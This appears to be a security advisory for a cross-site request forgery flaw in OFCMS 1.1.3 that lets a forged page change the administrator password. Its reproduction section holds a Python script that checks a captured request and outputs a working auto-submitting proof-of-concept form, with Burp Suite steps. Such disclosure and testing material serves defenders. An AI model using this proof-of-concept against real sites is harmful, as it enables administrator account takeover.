OFCMS Cross-Site Request Forgery Vulnerability

Vulnerability

A cross-site request forgery (CSRF) vulnerability has been identified in OFCMS version 1.1.3. The affected function has not been identified; what is reported is that a state-changing request, such as the administrator password change, is accepted on the strength of the victim's session cookie alone, with no anti-CSRF token or equivalent origin check. A remote attacker who can get an authenticated administrator to load a page under the attacker's control can therefore have the administrator's browser submit that request and change sensitive information, including the administrator password.

Impact

Exploitation of this vulnerability allows cross-site request forgery: an attacker tricks a logged-in user into performing actions they did not intend, such as changing their password or other account information. The attacker never sees the server's response, but a forged password change is enough to lock the administrator out and take over the account. Exploitation requires that the victim has an active session and visits attacker-controlled content in the same browser; no interaction beyond loading the page is needed.

Reproduction

To reproduce this vulnerability, log in as an administrator, change the password through the normal interface, and intercept the resulting request with a tool like Burp Suite. Confirm that the request carries only the session cookie and ordinary form fields, with no anti-CSRF token, custom header, or other per-request secret. Build a proof-of-concept HTML page that auto-submits a form with the same parameters to the same endpoint (Burp Suite Professional offers this under Engagement tools, Generate CSRF PoC), host it on a separate origin, and open it in the browser where the administrator is still logged in. The browser attaches the session cookie to the forged request, which simulates a user clicking an attacker's link, and the password is changed without the administrator's intent.
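As an added example, not part of this advisory or of OFCMS, the following Python script performs the two steps above on a captured request: it checks whether the request is actually forgeable by a cross-site form (no token-like parameter, no custom header, a form-compatible content type) and, if so, emits the auto-submitting proof-of-concept page. The captured request is constructed for the example; the endpoint path /admin/user/password, the parameter names, and the host are assumptions, since the page does not name the real OFCMS function.

```python
"""Check a captured request for CSRF protection and build an auto-submit PoC page."""
import re
from html import escape
from urllib.parse import parse_qsl

# Constructed sample of a captured password-change request. The path, host,
# and parameter names are placeholders for this example, not OFCMS's real ones.
CAPTURED_REQUEST = (
    "POST /admin/user/password HTTP/1.1\r\n"
    "Host: ofcms.example.test\r\n"
    "Cookie: JSESSIONID=0123456789ABCDEF\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 38\r\n"
    "\r\n"
    "password=NewPass123&confirm=NewPass123"
)

# Parameter names that usually carry a synchronizer token.
TOKEN_PARAM = re.compile(r"(csrf|xsrf|token|nonce)", re.IGNORECASE)
# Headers a plain cross-site <form> submission cannot set; if the real request
# needs one of them, a form-based CSRF page cannot reproduce it.
CUSTOM_HEADERS = {"x-csrf-token", "x-xsrf-token", "x-requested-with"}
# Content types a cross-site <form> can send without a CORS preflight.
FORM_TYPES = {"application/x-www-form-urlencoded", "multipart/form-data", "text/plain"}


def parse_request(raw):
    """Split a raw HTTP/1.1 request (as copied from a proxy) into its parts."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def csrf_indicators(req):
    """Return reasons this request is NOT a CSRF candidate; an empty list means it is."""
    reasons = []
    for name, _ in parse_qsl(req["body"], keep_blank_values=True):
        if TOKEN_PARAM.search(name):
            reasons.append(f"body carries a token-like parameter: {name}")
    for name in sorted(CUSTOM_HEADERS & set(req["headers"])):
        reasons.append(f"request needs custom header {name}, which a form cannot send")
    ctype = req["headers"].get("content-type", "").split(";")[0].strip().lower()
    if ctype and ctype not in FORM_TYPES:
        reasons.append(f"content type {ctype} cannot be sent by a cross-site form")
    return reasons


def build_csrf_poc(req, origin):
    """Emit an HTML page that auto-submits the captured parameters to origin + path."""
    fields = "\n".join(
        f'    <input type="hidden" name="{escape(n)}" value="{escape(v)}">'
        for n, v in parse_qsl(req["body"], keep_blank_values=True)
    )
    action = escape(origin.rstrip("/") + req["path"])
    return (
        "<!doctype html>\n<html><body>\n"
        f'  <form id="csrf" method="{escape(req["method"])}" action="{action}">\n'
        f"{fields}\n"
        "  </form>\n"
        "  <script>document.getElementById('csrf').submit();</script>\n"
        "</body></html>\n"
    )


if __name__ == "__main__":
    req = parse_request(CAPTURED_REQUEST)
    blockers = csrf_indicators(req)
    if blockers:
        print("Not forgeable by a simple form:", *blockers, sep="\n  ")
    else:
        print(build_csrf_poc(req, "https://ofcms.example.test"))
```

Host the generated page on any origin other than the target, open it in the browser that holds the administrator session, and verify the password changed. If the browser applies SameSite=Lax to the session cookie by default, the cookie will not be attached to a cross-site POST; check the cookie's SameSite attribute before concluding the endpoint is safe, because a cookie set with SameSite=None or an older browser still leaves it exposed.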

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 5.0
exploitability: 5.8
remediation: 0.0
relevance: 0.0
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these eight vulnerability categories, which are then combined to calculate the overall risk score.